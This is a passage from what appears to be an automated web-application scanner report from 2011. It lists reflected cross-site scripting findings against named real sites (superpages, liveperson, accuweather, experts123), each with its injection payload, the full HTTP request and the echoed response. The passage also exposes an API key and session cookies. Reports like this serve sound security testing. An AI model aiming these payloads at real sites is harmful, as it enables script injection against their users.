var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.662. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/showHide.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbf87"-alert(1)-"52571632a65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ypbbf87"-alert(1)-"52571632a65/js/showHide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /ypbbf87&quot;-alert(1)-&quot;52571632a65/js/showHide.js
Server: Unspecified
Set-Cookie: JSESSIONID=3503703CC4CACD6B2BC941DCABAA2129; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:22 GMT
Cache-Control: private
Content-Length: 36073


                       <!--
       
       -->


                                   
...[SNIP]...
ostServ = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/ypbbf87"-alert(1)-"52571632a65/js/showHide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.663. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/showHide.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eeb8"-alert(1)-"e241847a207 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/js4eeb8"-alert(1)-"e241847a207/showHide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/js4eeb8&quot;-alert(1)-&quot;e241847a207/showHide.js
Server: Unspecified
Set-Cookie: JSESSIONID=15C47AD265D59EE717AEA5A2D2950B64; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:39 GMT
Cache-Control: private
Content-Length: 36073


                       <!--
       
       -->


                                   
...[SNIP]...
Serv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/js4eeb8"-alert(1)-"e241847a207/showHide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.664. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/showHide.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed951"-alert(1)-"e596cd16daa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/js/showHide.jsed951"-alert(1)-"e596cd16daa HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/js/showHide.jsed951&quot;-alert(1)-&quot;e596cd16daa
Server: Unspecified
Set-Cookie: JSESSIONID=5BD8F1FDB942096A70CE97B3C572330D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:48 GMT
Cache-Control: private
Content-Length: 36073


                       <!--
       
       -->


                                   
...[SNIP]...
://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/js/showHide.jsed951"-alert(1)-"e596cd16daa?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.665. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c7f'-alert(1)-'d23b91857f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c0c7f'-alert(1)-'d23b91857f7

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 13:47:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3686
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Dc0c7f%27%2Dalert%281%29%2D%27d23b91857f7; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=LLOJGOICFHNPLMCFLGEAMHAL; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<TITLE>Customer Service Solutions - LivePerson</title>
<META NAME="descripti
...[SNIP]...
<script language='javascript'>
   lpAddVars('visitor','Visitor+Referrer','http://www.google.com/search?hl=en&q=c0c7f'-alert(1)-'d23b91857f7');
   lpAddVars('page','pageName','');
</script>
...[SNIP]...

4.666. http://www.accuweather.com/index-radar.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /index-radar.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f5bc</script><script>alert(1)</script>da526c0c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index-radar.asp HTTP/1.1
Host: www.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Length: 64616
Content-Type: text/html
Cache-Control: public
Date: Thu, 03 Feb 2011 16:35:04 GMT
Connection: close
Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/
Set-Cookie: aco=dbg=0; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law
...[SNIP]...

4.667. http://www.accuweather.com/maps-satellite.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /maps-satellite.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea202</script><script>alert(1)</script>53080030620 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /maps-satellite.asp HTTP/1.1
Host: www.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Length: 64040
Content-Type: text/html
Cache-Control: public
Date: Thu, 03 Feb 2011 16:35:14 GMT
Connection: close
Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/
Set-Cookie: aco=dbg=0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law
...[SNIP]...

4.668. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/general-mortgage-information-what-is-a-mortgage-828301.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2434"%3balert(1)//40b9502e47 was submitted in the Referer HTTP header. This input was echoed as e2434";alert(1)//40b9502e47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e2434"%3balert(1)//40b9502e47

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 35109


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "e2434";alert(1)//40b9502e47";
var RSQ = true;

$(function() {
experts123.Question.initialize(828301, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.669. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/general-mortgage-information-what-is-a-mortgage-828301.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80de'%3balert(1)//2bbe976dfa9 was submitted in the Referer HTTP header. This input was echoed as d80de';alert(1)//2bbe976dfa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d80de'%3balert(1)//2bbe976dfa9

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 35111


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=d80de';alert(1)//2bbe976dfa9');
});


</script>
...[SNIP]...

4.670. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/how-are-mortgage-properties-registered.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58da2'%3balert(1)//bbd7524fdca was submitted in the Referer HTTP header. This input was echoed as 58da2';alert(1)//bbd7524fdca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/how-are-mortgage-properties-registered.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=58da2'%3balert(1)//bbd7524fdca

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:17 GMT
Connection: close
Content-Length: 30482


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=58da2';alert(1)//bbd7524fdca');
});


</script>
...[SNIP]...

4.671. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/how-are-mortgage-properties-registered.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcd6c"%3balert(1)//f1f27091f7b was submitted in the Referer HTTP header. This input was echoed as bcd6c";alert(1)//f1f27091f7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/how-are-mortgage-properties-registered.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bcd6c"%3balert(1)//f1f27091f7b

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 30482


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "bcd6c";alert(1)//f1f27091f7b";
var RSQ = true;

$(function() {
experts123.Question.initialize(630175, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.672. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what's-the-best-checking-account-for-me.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdc6b'%3balert(1)//1fcabebdc24 was submitted in the Referer HTTP header. This input was echoed as fdc6b';alert(1)//1fcabebdc24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fdc6b'%3balert(1)//1fcabebdc24

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 29547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=fdc6b';alert(1)//1fcabebdc24');
});


</script>
...[SNIP]...

4.673. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what's-the-best-checking-account-for-me.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25f3f"%3balert(1)//41fc69da3be was submitted in the Referer HTTP header. This input was echoed as 25f3f";alert(1)//41fc69da3be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=25f3f"%3balert(1)//41fc69da3be

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 29547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "25f3f";alert(1)//41fc69da3be";
var RSQ = true;

$(function() {
experts123.Question.initialize(821025, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.674. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-checking-account-limit.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc8e'%3balert(1)//6bb3a5f1c5f was submitted in the Referer HTTP header. This input was echoed as ccc8e';alert(1)//6bb3a5f1c5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-checking-account-limit.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ccc8e'%3balert(1)//6bb3a5f1c5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33335


